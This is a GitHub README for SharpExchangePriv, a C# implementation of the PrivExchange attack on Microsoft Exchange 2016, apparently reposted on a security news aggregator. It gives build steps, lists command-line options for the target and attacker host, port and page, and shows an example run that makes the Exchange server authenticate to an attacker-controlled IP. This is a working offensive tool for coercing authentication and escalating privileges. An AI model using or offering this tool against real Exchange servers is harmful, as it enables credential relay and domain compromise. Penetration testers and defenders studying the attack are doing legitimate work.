panagioto/SharpExchangePriv
2019-02-26 00:41:58 Author: github.com(查看原文) 阅读量:175 收藏

Description

A C# implementation of PrivExchange by @_dirkjan. Kudos to @g0ldenGunSec, as I relied on his code.

It was tested against Exchange 2016.

Compile Instructions

SharpExchangePriv has been built against .NET 3.5 and is compatible with Visual Studio 2017. Simply open the solution file and build the project.

I used the CommandLineParser in order to parse the arguments. This will create the CommandLine.dll file, along with the executable. You can simple merget the .exe and the .dll into one executable file:

ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll

Usage

--targetHost

Set the IP of the target host.

--attackerHost

Set the attacker's IP

--attackerPort

Set the attacker's port

--attackerPage

Set the attacker's page

--ssl

Enable SSL

--exchangeVersion

Set Exchange version, default is 2016

--exchangePort

Set Exchange target port

Example

C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
 /$$$$$$$           /$$            /$$$$$$$$                     /$$
| $$__  $$         |__/           | $$_____/                    | $$
| $$  \ $$ /$$$$$$  /$$ /$$    /$$| $$       /$$   /$$  /$$$$$$$| $$$$$$$   /$$$$$$  /$$$$$$$   /$$$$$$   /$$$$$$
| $$$$$$$//$$__  $$| $$|  $$  /$$/| $$$$$   |  $$ /$$/ /$$_____/| $$__  $$ |____  $$| $$__  $$ /$$__  $$ /$$__  $$
| $$____ /| $$  \__ /| $$ \  $$/$$/ | $$__ /    \  $$$$/ | $$      | $$  \ $$  /$$$$$$$| $$  \ $$| $$  \ $$| $$$$$$$$
| $$     | $$      | $$  \  $$$/  | $$        >$$  $$ | $$      | $$  | $$ /$$__  $$| $$  | $$| $$  | $$| $$_____ /
| $$     | $$      | $$   \  $/   | $$$$$$$$ /$$/\  $$|  $$$$$$$| $$  | $$|  $$$$$$$| $$  | $$|  $$$$$$$|  $$$$$$$
|__/     |__/      |__/    \_/    |________/|__/  \__/ \_______/|__/  |__/ \_______/|__/  |__/ \____  $$ \_______/
                                                                                               /$$  \ $$
                                                                                              |  $$$$$$/
                                                                                               \______ /
                                                                                                            @den_n1s

The target URL is https://192.168.11.10:443/EWS/Exchange.asmx

Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx

HTTP 200 response received, the target Exchange server should be authenticating shortly.

Contact

Please submit any bugs on the Github project page or give me a shout on twitter @den_n1s


文章来源: https://github.com/panagioto/SharpExchangePriv
如有侵权请联系:admin#unsafe.sh